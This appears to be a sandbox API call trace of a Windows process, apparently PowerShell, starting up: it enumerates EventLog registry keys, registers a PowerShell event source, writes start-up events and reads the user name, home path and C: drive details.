	[0788.772] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d27c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d278, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d27c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d278*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.772] CoTaskMemFree (pv=0x0) 
	[0788.772] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.772] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.772] CoTaskMemFree (pv=0x484760) 
	[0788.772] CoTaskMemFree (pv=0x0) 
	[0788.773] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.773] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.773] CoTaskMemFree (pv=0x484760) 
	[0788.773] CoTaskMemFree (pv=0x0) 
	[0788.773] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.773] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.773] CoTaskMemFree (pv=0x484760) 
	[0788.773] CoTaskMemFree (pv=0x0) 
	[0788.773] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.773] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.773] CoTaskMemFree (pv=0x484760) 
	[0788.773] CoTaskMemFree (pv=0x0) 
	[0788.773] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.773] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.774] CoTaskMemFree (pv=0x484760) 
	[0788.774] CoTaskMemFree (pv=0x0) 
	[0788.774] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.774] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.774] CoTaskMemFree (pv=0x484760) 
	[0788.774] CoTaskMemFree (pv=0x0) 
	[0788.774] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.774] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.774] CoTaskMemFree (pv=0x484760) 
	[0788.774] CoTaskMemFree (pv=0x0) 
	[0788.774] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.774] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.774] CoTaskMemFree (pv=0x484760) 
	[0788.775] CoTaskMemFree (pv=0x0) 
	[0788.775] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.775] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.775] CoTaskMemFree (pv=0x484760) 
	[0788.775] CoTaskMemFree (pv=0x0) 
	[0788.775] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x33c) returned 0x0
	[0788.775] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0788.775] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x364) returned 0x0
	[0788.775] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0788.775] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x368) returned 0x0
	[0788.776] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0788.776] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x36c) returned 0x0
	[0788.776] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0788.776] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x370) returned 0x0
	[0788.776] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0788.776] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x374) returned 0x0
	[0788.776] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0788.776] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x378) returned 0x0
	[0788.776] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0788.777] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x37c) returned 0x0
	[0788.777] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0788.777] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x380) returned 0x0
	[0788.777] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x384) returned 0x0
	[0788.777] RegCloseKey (hKey=0x384) returned 0x0
	[0788.777] RegCloseKey (hKey=0x360) returned 0x0
	[0788.778] RegCloseKey (hKey=0x380) returned 0x0
	[0788.779] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2d8 | out: phkResult=0x20d2d8*=0x380) returned 0x0
	[0788.779] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d24c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d248, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d24c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d248*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.779] CoTaskMemFree (pv=0x0) 
	[0788.779] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.779] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.779] CoTaskMemFree (pv=0x484760) 
	[0788.779] CoTaskMemFree (pv=0x0) 
	[0788.779] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.779] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.779] CoTaskMemFree (pv=0x484760) 
	[0788.779] CoTaskMemFree (pv=0x0) 
	[0788.779] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.779] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.780] CoTaskMemFree (pv=0x484760) 
	[0788.780] CoTaskMemFree (pv=0x0) 
	[0788.780] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.780] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.780] CoTaskMemFree (pv=0x484760) 
	[0788.780] CoTaskMemFree (pv=0x0) 
	[0788.780] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.780] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.780] CoTaskMemFree (pv=0x484760) 
	[0788.780] CoTaskMemFree (pv=0x0) 
	[0788.780] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.780] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.780] CoTaskMemFree (pv=0x484760) 
	[0788.780] CoTaskMemFree (pv=0x0) 
	[0788.781] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.781] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.781] CoTaskMemFree (pv=0x484760) 
	[0788.781] CoTaskMemFree (pv=0x0) 
	[0788.781] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.781] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.781] CoTaskMemFree (pv=0x484760) 
	[0788.781] CoTaskMemFree (pv=0x0) 
	[0788.781] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0788.781] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x484760, lpcchName=0x20d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0788.781] CoTaskMemFree (pv=0x484760) 
	[0788.781] CoTaskMemFree (pv=0x0) 
	[0788.781] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x360) returned 0x0
	[0788.781] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x0) returned 0x2
	[0788.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x384) returned 0x0
	[0788.782] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x0) returned 0x2
	[0788.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x388) returned 0x0
	[0788.782] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x0) returned 0x2
	[0788.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x38c) returned 0x0
	[0788.782] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x0) returned 0x2
	[0788.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x390) returned 0x0
	[0788.782] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x0) returned 0x2
	[0788.783] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x394) returned 0x0
	[0788.783] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x0) returned 0x2
	[0788.783] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x398) returned 0x0
	[0788.783] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x0) returned 0x2
	[0788.783] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x39c) returned 0x0
	[0788.783] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x0) returned 0x2
	[0788.783] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x3a0) returned 0x0
	[0788.783] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d338 | out: phkResult=0x20d338*=0x3a4) returned 0x0
	[0788.784] RegCloseKey (hKey=0x3a4) returned 0x0
	[0788.784] RegCloseKey (hKey=0x380) returned 0x0
	[0788.784] RegCloseKey (hKey=0x3a0) returned 0x0
	[0788.789] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b940008
	[0789.090] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2de0c40*="WSMan", lpRawData=0x2de09b0) returned 1
	[0789.094] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0789.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.094] CoTaskMemFree (pv=0x43e1c0) 
	[0789.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.097] CoTaskMemAlloc (cb=0x804) returned 0x1b873a70
	[0789.097] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b873a70, nSize=0x20d5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5c8) returned 0x1
	[0789.097] CoTaskMemFree (pv=0x1b873a70) 
	[0789.097] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0789.097] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d608) returned 1
	[0789.098] CoTaskMemFree (pv=0x484760) 
	[0789.098] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2de6178*="Alias", lpRawData=0x2de5f08) returned 1
	[0789.102] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0789.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.103] CoTaskMemFree (pv=0x43e1c0) 
	[0789.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.105] CoTaskMemAlloc (cb=0x804) returned 0x1b873a70
	[0789.105] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b873a70, nSize=0x20d5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5c8) returned 0x1
	[0789.106] CoTaskMemFree (pv=0x1b873a70) 
	[0789.106] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0789.106] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d608) returned 1
	[0789.106] CoTaskMemFree (pv=0x484760) 
	[0789.107] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2deb770*="Environment", lpRawData=0x2deb500) returned 1
	[0789.143] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0789.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.143] CoTaskMemFree (pv=0x43e1c0) 
	[0789.144] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0789.144] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0789.144] CoTaskMemFree (pv=0x43e1c0) 
	[0789.144] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0789.144] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0789.145] CoTaskMemFree (pv=0x43e1c0) 
	[0789.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x20d170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0789.145] SetErrorMode (uMode=0x1) returned 0x1
	[0789.146] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x20d380 | out: lpFileInformation=0x20d380*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.146] SetErrorMode (uMode=0x1) returned 0x1
	[0789.147] GetLogicalDrives () returned 0x4
	[0789.147] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0789.149] SetErrorMode (uMode=0x1) returned 0x1
	[0789.150] CoTaskMemAlloc (cb=0x68) returned 0x1b855f60
	[0789.150] CoTaskMemAlloc (cb=0x68) returned 0x1b856200
	[0789.150] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b855f60, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x20d350, lpMaximumComponentLength=0x20d34c, lpFileSystemFlags=0x20d348, lpFileSystemNameBuffer=0x1b856200, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20d350*=0x9c354b42, lpMaximumComponentLength=0x20d34c*=0xff, lpFileSystemFlags=0x20d348*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0789.150] CoTaskMemFree (pv=0x1b855f60) 
	[0789.150] CoTaskMemFree (pv=0x1b856200) 
	[0789.150] SetErrorMode (uMode=0x1) returned 0x1
	[0789.150] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0789.152] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.152] SetErrorMode (uMode=0x1) returned 0x1
	[0789.152] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d2f0 | out: lpFileInformation=0x20d2f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.152] SetErrorMode (uMode=0x1) returned 0x1
	[0789.152] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.152] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cf40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.152] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0789.153] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.153] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0789.154] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.154] SetErrorMode (uMode=0x1) returned 0x1
	[0789.154] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d120 | out: lpFileInformation=0x20d120*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.154] SetErrorMode (uMode=0x1) returned 0x1
